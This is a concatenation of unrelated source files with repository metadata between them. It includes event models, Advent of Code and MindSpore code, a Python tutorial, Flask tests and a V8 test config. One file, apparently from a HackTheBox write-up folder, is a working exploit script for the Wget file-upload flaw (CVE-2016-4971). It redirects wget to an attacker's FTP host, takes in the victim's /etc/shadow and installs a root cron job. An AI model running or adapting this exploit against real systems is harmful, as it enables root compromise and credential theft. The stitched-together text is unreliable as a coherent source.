print(f'{attribute.capitalize()}:: ') print(('-' * 20)) for value in value_list: if isinstance(value, str): print(value, end=' ') else: for data in value: print(f'{data.capitalize()}:: {value[data]}') print() print() except KeyError: pass
31.266667
96
0.534115
a8e96a1419b40c5be96c2127eaee9943ccfe26c2
1,930
py
Python
src/onegov/event/models/mixins.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
src/onegov/event/models/mixins.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
src/onegov/event/models/mixins.py
politbuero-kampagnen/onegov-cloud
20148bf321b71f617b64376fe7249b2b9b9c4aa9
[ "MIT" ]
null
null
null
from onegov.core.orm.types import UTCDateTime from sedate import to_timezone from sqlalchemy import Column from sqlalchemy import String from sqlalchemy import Text from sqlalchemy.dialects.postgresql import HSTORE from sqlalchemy.ext.mutable import MutableDict class OccurrenceMixin(object): """ Contains all attributes events and ocurrences share. The ``start`` and ``end`` date and times are stored in UTC - that is, they are stored internally without a timezone and are converted to UTC when getting or setting, see :class:`UTCDateTime`. Use the properties ``localized_start`` and ``localized_end`` to get the localized version of the date and times. """ #: Title of the event title = Column(Text, nullable=False) #: A nice id for the url, readable by humans name = Column(Text) #: Description of the location of the event location = Column(Text, nullable=True) #: Tags/Categories of the event _tags = Column(MutableDict.as_mutable(HSTORE), nullable=True, name='tags') @property def tags(self): """ Tags/Categories of the event. """ return list(self._tags.keys()) if self._tags else [] @tags.setter def tags(self, value): self._tags = dict(((key.strip(), '') for key in value)) #: Timezone of the event timezone = Column(String, nullable=False) #: Start date and time of the event (of the first event if recurring) start = Column(UTCDateTime, nullable=False) @property def localized_start(self): """ The localized version of the start date/time. """ return to_timezone(self.start, self.timezone) #: End date and time of the event (of the first event if recurring) end = Column(UTCDateTime, nullable=False) @property def localized_end(self): """ The localized version of the end date/time. """ return to_timezone(self.end, self.timezone)
31.129032
78
0.689637
d16e278d7bc64d38072b77f5142fbceaee36a5ef
3,075
py
Python
aoc2020/day_20/part_1.py
en0/aoc2020
a2f41b909dffe1f366682b3d03fd5fbdbc924ec0
[ "MIT" ]
null
null
null
aoc2020/day_20/part_1.py
en0/aoc2020
a2f41b909dffe1f366682b3d03fd5fbdbc924ec0
[ "MIT" ]
null
null
null
aoc2020/day_20/part_1.py
en0/aoc2020
a2f41b909dffe1f366682b3d03fd5fbdbc924ec0
[ "MIT" ]
null
null
null
from aoc2020 import * from aoc2020.utils import math_product from itertools import chain import numpy as np def tborder(tile): _, m = tile return "".join(m[0]) def bborder(tile): _, m = tile return "".join(m[-1]) def lborder(tile): _, m = tile return "".join(m[:,0]) def rborder(tile): _, m = tile return "".join(m[:,-1]) def orientations(tile): k, m = tile for _ in range(2): for i in range(4): yield k, m m = np.rot90(m) m = np.fliplr(m) class Solution(SolutionABC): expected = 20899048083289 def solve(self) -> any: all_tiles = self.load_tiles() image_table = self.get_image_table(all_tiles) return math_product([image_table[y][x][0] for x, y in [(0, 0), (0, -1), (-1, 0), (-1, -1)]]) @classmethod def get_image_table(cls, tiles): # Find the top most piece. search_tile = tiles[0] while search_tile is not None: t0, search_tile = search_tile, None for t in chain(*[orientations(x) for x in tiles if x[0] != t0[0]]): if tborder(t0) == bborder(t): search_tile = t break search_tile = t0 # Find the left most piece. while search_tile is not None: t0, search_tile = search_tile, None for t in chain(*[orientations(x) for x in tiles if x[0] != t0[0]]): if lborder(t0) == rborder(t): search_tile = t break search_tile = t0 assigned = set([search_tile[0]]) # Find all the left most pieces. img = [[search_tile]] while search_tile is not None: t0, search_tile = search_tile, None for t in chain(*[orientations(x) for x in tiles if x[0] not in assigned]): if bborder(t0) == tborder(t): search_tile = t img.append([t]) assigned.add(t[0]) break # Find the rest of each row for row in img: search_tile = row[0] while search_tile is not None: t0, search_tile = search_tile, None for t in chain(*[orientations(x) for x in tiles if x[0] not in assigned]): if rborder(t0) == lborder(t): search_tile = t row.append(t) assigned.add(t[0]) break #for r in img: # print(" ".join([str(c) for c, _ in r])) return img def load_tiles(self): with self.load_resource("input") as src: return [(k, m) for k, m in self.read_tiles(src)] def read_tiles(self, src): while True: tile_heading = self.read_line(src) if tile_heading == "": return tile_id = int(tile_heading[5:-1]) matrix = list(self.read_until(src, xfrm=lambda s: list(s))) yield tile_id, np.array(matrix)
29.009434
100
0.509593
66f5d3ec30ee3cb74953f418ac60d6f97eadd0de
5,233
py
Python
Python/Programação_em_Python_Essencial/5- Coleções/dicionarios.py
vdonoladev/aprendendo-programacao
83abbcd6701b2105903b28fd549738863418cfb8
[ "MIT" ]
null
null
null
Python/Programação_em_Python_Essencial/5- Coleções/dicionarios.py
vdonoladev/aprendendo-programacao
83abbcd6701b2105903b28fd549738863418cfb8
[ "MIT" ]
null
null
null
Python/Programação_em_Python_Essencial/5- Coleções/dicionarios.py
vdonoladev/aprendendo-programacao
83abbcd6701b2105903b28fd549738863418cfb8
[ "MIT" ]
null
null
null
""" Dicionários OBS: Em algumas linguagens de programação, os dicionários Python são conhecidos por mapas. Dicionários são coleções do tipo chave/valor. (Mapeamento entre chave e valor) #Tuplas [0, 1, 2] [1, 2, 3] # Listas (0, 1, 2) (1, 2, 3) Dicionários são representados por chaves {}. print(type({})) OBS: Sobre dicionários - Chave e valor são separados por dois pontos 'chave:valor'; - Tanto chave quanto valor podem ser de qualquer tipo de dado; - Podemos misturar tipos de dados; # Criação de dicionários # Forma1 (Mais comum) paises = {'br': 'Brasil', 'eua': 'Estados Unidos', 'py': 'Paraguay'} print(paises) print(type(paises)) # Forma2 (Menos comum) paises = dict(br='Brasil', eua='Estados Unidos', py='Paraguay') print(paises) print(type(paises)) # Acessando elementos # Forma1 - Acessando via chave, da mesma forma que lista/tupla print(paises['br']) # print(paises['ru']) # OBS: Caso tentamos fazer um acesso utilizando uma chave que não existe, teremos o erro KeyError # Forma2 - Acessando via get (Recomendada) print(paises.get('br')) print(paises.get('ru')) # Caso o get não encontre o objeto com a chave informada, será retornado o valor None e não será gerado KeyError pais = paises.get('ru') if pais: print(f'Encontrei o país {pais}') else: print('Não encontrei o país') # Podemos definir um valor padrão para caso não encontremos o objeto com a chave informada pais = paises.get('ru', 'Não encontrado') print(f'Encontrei o país {pais}') # Podemos verificar se determinada chave se encontra em um dicionário print('br' in paises) print('ru' in paises) print('Estados Unidos' in paises) if 'ru' in paises: russia = paises['ru'] # Podemos utilizar qualquer tipo de dado (int, float, string, boolean), inclusive lista, tupla, dicionário, como chaves # de dicionários. # Tuplas, por exemplo, são bastante interessantes de serem utilizadas como chave de dicionários, pois as mesmas # são imutáveis. localidades = { (35.6895, 39.6917): 'Escritório em Tókio' (40.7128, 74.0060): 'Escritório em Nova York' (37.7749, 122.4194): 'Escritório em São Paulo' } print(localidades) print(type(localidades)) # Adicionar elementos em um dicionário receita = {'jan': 100, 'fev': 120, 'mar': 300} print(receita) print(type(receita)) # Forma1 - Mais comum receita['abr'] = 350 print(receita) # Forma2 novo_dado = {'mai': 500} receita.update(novo_dado) # receita.update({'mai': 500}) print(receita) # Atualizando dados em um dicionário # Forma1 receita['mai'] = 550 print(receita) # Forma2 receita.update({'mai': 600}) print(receita) # CONCLUSÃO1: A forma de adicionar novos elementos ou atualizar dados em um dicionário é a mesma. # CONCLUSÃO2: Em dicionários, NÂO podemos ter chaves repetidas. # Remover dados de um dicionário receita = {'jan': 100, 'fev': 120, 'mar': 300} print(receita) # Forma1 - Mais comum ret = receita.pop('mar') print(ret) print(receita) # OBS1: Aqui precisamos SEMPRE informar a chave, e caso não encontre o elemento, um KeyError é retornado. # OBS2: Ao removermos um objeto, o valor deste objeto é sempre retornado. # Forma2 del receita['fev'] print(receita) # Se a chave não existir, será gerado um KeyError # OBS: Neste caso, o valor removido não é retornado. # Imagine que você tem um comércio eletrônico, onde temos um carrinho de compras na qual adicionamos produtos. Carrinho de Compras: Produto 1: - nome; - quantidade; - preço; Produto 2: - nome; - quantidade; - preço; # 1 - Poderíamos utilizar uma Lista para isso? Sim carrinho = [] produto1 = ['PlayStation 4', 1, 2300.00] produto2 = ['God of War 4', 1, 150.00] carrinho.append(produto1) carrinho.append(produto2) print(carrinho) # Teríamos que saber qual é o índice de cada informação no produto. # 2 - Poderíamos utilizar uma Tupla para isso? Sim produto1 = ('PlayStation 4', 1, 2300.00) produto2 = ('God of War 4', 1, 150.00) carrinho = (produto1, produto2) print(carrinho) # 3 - Poderíamos utilizar um Dicionário para isso? Sim carrinho = [] produto1 = {'Nome': 'PlayStation 4', 'Quantidade': 1, 'Preço': 2300.00} produto2 = {'Nome': 'God of War 4', 'Quantidade': 1, 'Preço': 150.00} carrinho.append(produto1) carrinho.append(produto2) print(carrinho) # Desta forma, facilmente adicionamos ou removemos produtos no carrinho e em cada produto # podemos ter a certeza sobre cada informação. # Métodos de dicionários d = dict(a=1, b=2, c=3) print(d) print(type(d)) # Limpar o dicionário (Zerar dados) d.clear() print(d) # Copiando um dicionário para outro # Forma1 # Deep Copy novo = d.copy() print(novo) novo['d'] = 4 print(d) print(novo) # Forma2 # Shallow Copy novo = d print(novo) novo['d'] = 4 print(d) print(novo) """ # Forma não usual de criação de dicionários outro = {}.fromkeys('a', 'b') print(outro) print(type(outro)) usuario = {}.fromkeys(['nome', 'pontos', 'email', 'profile'], 'desconhecido') print(usuario) print(type(usuario)) # O método fromkeys recebe dois parâmetros: um iterável e um valor. # Ele vai gerar para cada valor do iterável uma chave e irá atribuir a esta chave o valor informado. veja = {}.fromkeys('teste', 'valor') print(veja) veja = {}.fromkeys(range(1, 11), 'novo') print(veja)
19.672932
119
0.708962
7d2101f86882a0cc92b62811b4a431f69e0f581a
8,025
py
Python
tests/test_gallery.py
goosechooser/benwaonline
e2879412aa6c3c230d25cd60072445165517b6b6
[ "MIT" ]
null
null
null
tests/test_gallery.py
goosechooser/benwaonline
e2879412aa6c3c230d25cd60072445165517b6b6
[ "MIT" ]
16
2017-09-13T10:21:40.000Z
2020-06-01T04:32:22.000Z
tests/test_gallery.py
goosechooser/benwaonline
e2879412aa6c3c230d25cd60072445165517b6b6
[ "MIT" ]
null
null
null
import sys from datetime import datetime from io import BytesIO import pytest import requests_mock from flask import current_app, request, url_for, json from flask_login import current_user from marshmallow import pprint from benwaonline import mappers from benwaonline import entities from benwaonline.gallery import views from benwaonline.exceptions import BenwaOnlineError, BenwaOnlineRequestError import utils JWKS = utils.load_test_data('test_jwks.json') def benwa_resp(): return { "access_token": "LnUwYsyKvQgo8dLOeC84y-fsv_F7bzvZ", 'refresh_token': 'refresh_me_thanks', "expires_in": 3600, "scope": "openid email", "token_type": "Bearer" } def auth_payload(): return { "iss": "https://choosegoose.benwa.com/", "sub": "59866964", "aud": "1LX50Fa2L80jfr9P31aSZ5tifrnLFGDy", "iat": 1511860306, "exp": 1511896306 } def mock_auth_response(mocker, resp): mock = mocker.patch('benwaonline.auth.views.benwa.authorized_response') mock.return_value = resp return mock def login(client, mocker, m): user = utils.test_user() mocker.patch('benwaonline.auth.views.get_jwks', return_value=JWKS) mocker.patch('benwaonline.auth.views.verify_token', return_value=auth_payload()) mocker.patch('benwaonline.auth.views.handle_authorize_response', return_value=benwa_resp()) mocker.patch('benwaonline.auth.views.UserGateway.get_by_user_id', return_value=user) return client.get(url_for('authbp.authorize_callback'), follow_redirects=False) def signup(client, redirects=False): form = {'adjective': 'Beautiful', 'benwa': 'Benwa', 'noun': 'Aficionado', 'submit': True} return client.post(url_for('authbp.signup'), data=form, follow_redirects=redirects) def logout(client): mocker.patch('benwaonline.auth.views.verify_token', return_value=auth_payload()) return client.get('/auth/logout/callback', follow_redirects=False) def make_comment(client, post_id, data): uri = url_for('gallery.add_comment', post_id=post_id) return client.post(uri, data=data) class TestShowPosts(object): post_uri = mappers.collection_uri(entities.Post()) tag_uri = mappers.collection_uri(entities.Tag()) with open('tests/data/show_posts.json') as f: test_data = json.load(f) def test_empty_db(self, client): with requests_mock.Mocker() as mock: mock.get('/api/posts', json={'data': []}) mock.get(self.tag_uri, json={'data':[]}) response = client.get(url_for('gallery.show_posts')) assert response.status_code == 200 response = client.get(url_for('gallery.show_posts', tags='benwa')) assert response.status_code == 200 response = client.get(url_for('gallery.show_posts', tags='benwa+oldbenwa'), follow_redirects=True) assert response.status_code == 200 def test_posts_exist(self, client): posts = self.test_data['posts_with_previews'] tags = self.test_data['tags'] with requests_mock.Mocker() as mock: mock.get('/api/posts', json=posts) mock.get(self.tag_uri, json=tags) response = client.get(url_for('gallery.show_posts')) assert response.status_code == 200 response = client.get(url_for('gallery.show_posts', tags='benwa')) assert response.status_code == 200 response = client.get( url_for('gallery.show_posts', tags='benwa+oldbenwa'), follow_redirects=True) assert response.status_code == 200 class TestShowPost(object): post_id = 1 post_uri = mappers.instance_uri(entities.Post(id=1)) comments_uri = mappers.resource_uri(entities.Post(id=1), 'comments') with open('tests/data/show_post.json') as f: test_data = json.load(f) post = test_data['post'] comments = test_data['comments'] def test_no_post_exists(self, client, mocker): with requests_mock.Mocker() as mock: mock.get(self.post_uri, status_code=404, json=utils.error_response('Post', 1)) response = client.get( url_for('gallery.show_post', post_id=self.post_id), follow_redirects=False) assert response.status_code == 200 with pytest.raises(BenwaOnlineRequestError): template = views.show_post(post_id=1) assert 'Object not found' in template def test_post_exists_no_comments(self, client, mocker): with requests_mock.Mocker() as mock: mock.get(self.post_uri, json=self.post) mock.get('/api/posts/1/comments', json={'data':[]}) response = client.get(url_for('gallery.show_post', post_id=self.post_id), follow_redirects=False) assert response.status_code == 200 def test_post_exists_comments(self, client, mocker): self.post = self.test_data['post_comments_exist'] with requests_mock.Mocker() as mock: mock.get(self.post_uri, json=self.post) mock.get('/api/posts/1/comments', json=self.comments) response = client.get(url_for('gallery.show_post', post_id=self.post_id), follow_redirects=False) assert response.status_code == 200 def test_add_post_not_authenticated(client): test_post = {'tags': ['old_benwa', 'benwa'], 'submit': True} assert not current_user.is_authenticated response = client.get('/gallery/add', follow_redirects=False) assert 'authorize' in response.headers['Location'] response = client.post('/gallery/add', data=test_post, follow_redirects=False) assert 'authorize' in response.headers['Location'] def test_add_post_not_valid_submit(client, mocker): test_post = { 'tags': ['old_benwa', 'benwa'], 'filename': 'bartwa.jpg', 'submit': True } with requests_mock.Mocker() as mock: login(client, mocker, mock) response = client.post(url_for('gallery.add_post'), content_type='multipart/form-data', data=test_post, follow_redirects=False) assert response.status_code == 200 def test_add_post(client, mocker): test_post = { 'tags': ['old_benwa', 'benwa'], 'filename': 'bartwa.jpg', 'image': (BytesIO(b'my file contents'), 'bartwa.jpg'), 'submit': True } mocker.patch.object(sys.modules['benwaonline.gallery.views'], 'make_thumbnail') mocker.patch.object(sys.modules['benwaonline.gallery.views'], 'save_image') user = utils.test_user().dump() preview = entities.Preview(id=1) image = entities.Image(id=1) benwa_tag = entities.Tag(id=1, name='benwa') tag = entities.Tag(id=2, name='old_benwa') post = entities.Post(id=1, image=image, preview=preview, user=user, tags=[tag, benwa_tag]) with requests_mock.Mocker() as mock: login(client, mocker, mock) mock.post('/api/previews', json=preview.dump()) mock.post('/api/images', json=image.dump()) mock.post('/api/posts', json=post.dump()) mock.get('/api/posts/1', json=post.dump()) mock.get('/api/tags', json={'data':[]}) mock.post('/api/tags', json=tag.dump()) response = client.post(url_for('gallery.add_post'), content_type='multipart/form-data', data=test_post, follow_redirects=False) assert response.status_code == 302 assert 'gallery/show' in response.headers['Location'] @pytest.mark.skip def test_add_comment(client, mocker): form = {'content': 'its valid man','submit': True} with client.session_transaction() as sess: sess['access_token'] = 'Bearer ' + 'access token' with requests_mock.Mocker() as mock: login(client, mocker, mock) mock.post(current_app.config['API_URL'] + '/comments') response = client.post(url_for('gallery.add_comment', post_id=1), data=form) @pytest.mark.skip def test_delete_comment(client, mocker): login(client, mocker) assert current_user.is_authenticated
38.581731
110
0.669408
6995669a1592ee824cf447cadab2957ceab6665b
3,933
py
Python
3rdParty/V8/v5.7.492.77/test/inspector/testcfg.py
sita1999/arangodb
6a4f462fa209010cd064f99e63d85ce1d432c500
[ "Apache-2.0" ]
22
2016-07-28T03:25:31.000Z
2022-02-19T02:51:14.000Z
3rdParty/V8/v5.7.492.77/test/inspector/testcfg.py
lipper/arangodb
66ea1fd4946668192e3f0d1060f0844f324ad7b8
[ "Apache-2.0" ]
10
2016-09-30T14:57:49.000Z
2017-06-30T12:56:01.000Z
3rdParty/V8/v5.7.492.77/test/inspector/testcfg.py
lipper/arangodb
66ea1fd4946668192e3f0d1060f0844f324ad7b8
[ "Apache-2.0" ]
23
2016-08-03T17:43:32.000Z
2021-03-04T17:09:00.000Z
# Copyright 2016 the V8 project authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import itertools import os import re from testrunner.local import testsuite from testrunner.local import utils from testrunner.objects import testcase FLAGS_PATTERN = re.compile(r"//\s+Flags:(.*)") PROTOCOL_TEST_JS = "protocol-test.js" EXPECTED_SUFFIX = "-expected.txt" class InspectorProtocolTestSuite(testsuite.TestSuite): def __init__(self, name, root): super(InspectorProtocolTestSuite, self).__init__(name, root) def ListTests(self, context): tests = [] for dirname, dirs, files in os.walk(os.path.join(self.root), followlinks=True): for dotted in [x for x in dirs if x.startswith('.')]: dirs.remove(dotted) dirs.sort() files.sort() for filename in files: if filename.endswith(".js") and filename != PROTOCOL_TEST_JS: fullpath = os.path.join(dirname, filename) relpath = fullpath[len(self.root) + 1 : -3] testname = relpath.replace(os.path.sep, "/") test = testcase.TestCase(self, testname) tests.append(test) return tests def GetFlagsForTestCase(self, testcase, context): source = self.GetSourceForTest(testcase) flags_match = re.findall(FLAGS_PATTERN, source) flags = [] for match in flags_match: flags += match.strip().split() testname = testcase.path.split(os.path.sep)[-1] testfilename = os.path.join(self.root, testcase.path + self.suffix()) protocoltestfilename = os.path.join(self.root, PROTOCOL_TEST_JS) return [ protocoltestfilename, testfilename ] + flags def GetSourceForTest(self, testcase): filename = os.path.join(self.root, testcase.path + self.suffix()) with open(filename) as f: return f.read() def shell(self): return "inspector-test" def _IgnoreLine(self, string): """Ignore empty lines, valgrind output and Android output.""" if not string: return True return (string.startswith("==") or string.startswith("**") or string.startswith("ANDROID") or # FIXME(machenbach): The test driver shouldn't try to use slow # asserts if they weren't compiled. This fails in optdebug=2. string == "Warning: unknown flag --enable-slow-asserts." or string == "Try --help for options") def IsFailureOutput(self, testcase): file_name = os.path.join(self.root, testcase.path) + EXPECTED_SUFFIX with file(file_name, "r") as expected: expected_lines = expected.readlines() def ExpIterator(): for line in expected_lines: if line.startswith("#") or not line.strip(): continue yield line.strip() def ActIterator(lines): for line in lines: if self._IgnoreLine(line.strip()): continue yield line.strip() def ActBlockIterator(): """Iterates over blocks of actual output lines.""" lines = testcase.output.stdout.splitlines() start_index = 0 found_eqeq = False for index, line in enumerate(lines): # If a stress test separator is found: if line.startswith("=="): # Iterate over all lines before a separator except the first. if not found_eqeq: found_eqeq = True else: yield ActIterator(lines[start_index:index]) # The next block of output lines starts after the separator. start_index = index + 1 # Iterate over complete output if no separator was found. if not found_eqeq: yield ActIterator(lines) for act_iterator in ActBlockIterator(): for (expected, actual) in itertools.izip_longest( ExpIterator(), act_iterator, fillvalue=''): if expected != actual: return True return False def GetSuite(name, root): return InspectorProtocolTestSuite(name, root)
35.754545
83
0.663361
38e5142a0e015295b897f705f5b522fd98fa964d
2,834
py
Python
Boot2Root/hackthebox/Falafet/wget-exploit/wget-exploit.py
Kan1shka9/CTFs
33ab33e094ea8b52714d5dad020c25730e91c0b0
[ "MIT" ]
21
2016-02-06T14:30:01.000Z
2020-09-11T05:39:17.000Z
Boot2Root/hackthebox/Falafet/wget-exploit/wget-exploit.py
Kan1shka9/CTFs
33ab33e094ea8b52714d5dad020c25730e91c0b0
[ "MIT" ]
null
null
null
Boot2Root/hackthebox/Falafet/wget-exploit/wget-exploit.py
Kan1shka9/CTFs
33ab33e094ea8b52714d5dad020c25730e91c0b0
[ "MIT" ]
7
2017-02-02T16:27:02.000Z
2021-04-30T17:14:53.000Z
#!/usr/bin/env python # # Wget 1.18 < Arbitrary File Upload Exploit # Dawid Golunski # dawid( at )legalhackers.com # # http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt # # CVE-2016-4971 # import SimpleHTTPServer import SocketServer import socket; class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): # This takes care of sending .wgetrc print "We have a volunteer requesting " + self.path + " by GET :)\n" if "Wget" not in self.headers.getheader('User-Agent'): print "But it's not a Wget :( \n" self.send_response(200) self.end_headers() self.wfile.write("Nothing to see here...") return print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n" self.send_response(301) new_path = '%s'%('ftp://anonymous@%s:%s/shell.php'%(FTP_HOST, FTP_PORT) ) print "Sending redirect to %s \n"%(new_path) self.send_header('Location', new_path) self.end_headers() def do_POST(self): # In here we will receive extracted file and install a PoC cronjob print "We have a volunteer requesting " + self.path + " by POST :)\n" if "Wget" not in self.headers.getheader('User-Agent'): print "But it's not a Wget :( \n" self.send_response(200) self.end_headers() self.wfile.write("Nothing to see here...") return content_len = int(self.headers.getheader('content-length', 0)) post_body = self.rfile.read(content_len) print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body) print "Sending back a cronjob script as a thank-you for the file..." print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)" self.send_response(200) self.send_header('Content-type', 'text/plain') self.end_headers() self.wfile.write(ROOT_CRON) print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n" return HTTP_LISTEN_IP = '10.10.14.16' HTTP_LISTEN_PORT = 80 FTP_HOST = '10.10.14.16' FTP_PORT = 21 ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget \n" handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) print "Ready? Is your FTP server running?" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((FTP_HOST, FTP_PORT)) if result == 0: print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT) else: print "FTP is down :( Exiting." exit(1) print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT handler.serve_forever()
32.953488
145
0.661609
2a515b34a6909c06088f009b9969149b78a78fbb
5,013
py
Python
research/hpc/deepbsde/src/net.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/hpc/deepbsde/src/net.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/hpc/deepbsde/src/net.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Define the network structure of DeepBSDE""" import numpy as np import mindspore.common.dtype as mstype from mindspore import nn from mindspore import ops as P from mindspore import Tensor, Parameter class DeepBSDE(nn.Cell): """ The network structure of DeepBSDE. Args: cfg: configure settings. bsde(Cell): equation function """ def __init__(self, cfg, bsde): super(DeepBSDE, self).__init__() self.bsde = bsde self.delta_t = bsde.delta_t self.num_time_interval = bsde.num_time_interval self.dim = bsde.dim self.time_stamp = Tensor(np.arange(0, cfg.num_time_interval) * bsde.delta_t) self.y_init = Parameter(np.random.uniform(low=cfg.y_init_range[0], high=cfg.y_init_range[1], size=[1]).astype(np.float32)) self.z_init = Parameter(np.random.uniform(low=-0.1, high=0.1, size=[1, cfg.dim]).astype(np.float32)) self.subnet = nn.CellList([FeedForwardSubNet(cfg.dim, cfg.num_hiddens) for _ in range(bsde.num_time_interval-1)]) self.generator = bsde.generator self.matmul = P.MatMul() self.sum = P.ReduceSum(keep_dims=True) def construct(self, dw, x): """repeat FeedForwardSubNet (num_time_interval - 1) times.""" all_one_vec = P.Ones()((P.shape(dw)[0], 1), mstype.float32) y = all_one_vec * self.y_init z = self.matmul(all_one_vec, self.z_init) for t in range(0, self.num_time_interval - 1): y = y - self.delta_t * (self.generator(self.time_stamp[t], x[:, :, t], y, z)) + self.sum(z * dw[:, :, t], 1) z = self.subnet[t](x[:, :, t + 1]) / self.dim # terminal time y = y - self.delta_t * self.generator(self.time_stamp[-1], x[:, :, -2], y, z) + self.sum(z * dw[:, :, -1], 1) return y class FeedForwardSubNet(nn.Cell): """ Subnet to fit the spatial gradients at time t=tn Args: dim (int): dimension of the final output train (bool): True for train num_hidden list(int): number of hidden layers """ def __init__(self, dim, num_hiddens): super(FeedForwardSubNet, self).__init__() self.dim = dim self.num_hiddens = num_hiddens bn_layers = [nn.BatchNorm1d(c, momentum=0.99, eps=1e-6, beta_init='normal', gamma_init='uniform') for c in [dim] + num_hiddens + [dim]] self.bns = nn.CellList(bn_layers) dense_layers = [nn.Dense(dim, num_hiddens[0], has_bias=False, activation=None)] dense_layers = dense_layers + [nn.Dense(num_hiddens[i], num_hiddens[i + 1], has_bias=False, activation=None) for i in range(len(num_hiddens) - 1)] # final output should be gradient of size dim dense_layers.append(nn.Dense(num_hiddens[-1], dim, activation=None)) self.denses = nn.CellList(dense_layers) self.relu = nn.ReLU() def construct(self, x): """structure: bn -> (dense -> bn -> relu) * len(num_hiddens) -> dense -> bn""" x = self.bns[0](x) hiddens_length = len(self.num_hiddens) for i in range(hiddens_length): x = self.denses[i](x) x = self.bns[i+1](x) x = self.relu(x) x = self.denses[hiddens_length](x) x = self.bns[hiddens_length + 1](x) return x class WithLossCell(nn.Cell): """Loss function for DeepBSDE""" def __init__(self, net): super(WithLossCell, self).__init__() self.net = net self.terminal_condition = net.bsde.terminal_condition self.total_time = net.bsde.total_time self.sum = P.ReduceSum() self.delta_clip = 50.0 self.selete = P.Select() def construct(self, dw, x): y_terminal = self.net(dw, x) delta = y_terminal - self.terminal_condition(self.total_time, x[:, :, -1]) # use linear approximation outside the clipped range abs_delta = P.Abs()(delta) loss = self.sum(self.selete(abs_delta < self.delta_clip, P.Square()(delta), 2 * self.delta_clip * abs_delta - self.delta_clip * self.delta_clip)) return loss
41.775
120
0.596649
2aadb54c111d2e210d227f1fd406003b8af9a9a2
2,174
py
Python
research/cv/EDSR/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/cv/EDSR/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/cv/EDSR/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """ ##############export checkpoint file into air, mindir models################# python export.py """ import os import numpy as np import mindspore as ms from mindspore import Tensor, export, context from src.utils import init_net from model_utils.config import config from model_utils.device_adapter import get_device_id from model_utils.moxing_adapter import moxing_wrapper context.set_context(mode=context.GRAPH_MODE, device_target=config.device_target) if config.device_target == "Ascend": context.set_context(device_id=get_device_id()) MAX_HR_SIZE = 2040 @moxing_wrapper() def run_export(): """ run export """ print(config) cfg = config if cfg.pre_trained is None: raise RuntimeError('config.pre_trained is None.') net = init_net(cfg) max_lr_size = MAX_HR_SIZE // cfg.scale input_arr = Tensor(np.ones([1, cfg.n_colors, max_lr_size, max_lr_size]), ms.float32) file_name = os.path.splitext(os.path.basename(cfg.pre_trained))[0] file_name = file_name + f"_InputSize{max_lr_size}" file_path = os.path.join(cfg.output_path, file_name) file_format = 'MINDIR' num_params = sum([param.size for param in net.parameters_dict().values()]) export(net, input_arr, file_name=file_path, file_format=file_format) print(f"export success", flush=True) print(f"{cfg.pre_trained} -> {file_path}.{file_format.lower()}, net parameters = {num_params/1000000:>0.4}M", flush=True) if __name__ == '__main__': run_export()
33.446154
113
0.702852
934c122981015f026c29b97624efde2c5f90f58d
4,140
py
Python
research/cv/dcgan/verifyBySklSvmNetD_20_all_310.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/cv/dcgan/verifyBySklSvmNetD_20_all_310.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/cv/dcgan/verifyBySklSvmNetD_20_all_310.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
